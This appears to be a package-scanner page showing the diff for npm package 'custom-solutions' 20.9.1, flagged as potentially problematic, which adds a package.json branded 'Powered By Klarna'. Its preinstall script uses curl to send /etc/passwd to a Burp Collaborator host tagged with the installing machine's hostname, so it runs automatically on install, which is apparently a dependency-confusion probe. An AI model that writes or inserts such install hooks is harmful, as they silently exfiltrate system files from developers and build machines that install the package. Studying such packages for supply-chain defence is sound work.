custom-solutions 20.9.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of custom-solutions might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +15 -0
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "custom-solutions",
3
+ "version": "20.9.1",
4
+ "description": "Powered By Klarna",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).a3eijsl3ne7wjwco9e0ar967byho5d.burpcollaborator.net"
9
+ },
10
+ "keywords": [
11
+ "klarna"
12
+ ],
13
+ "author": "h1-klarna",
14
+ "license": "ISC"
15
+ }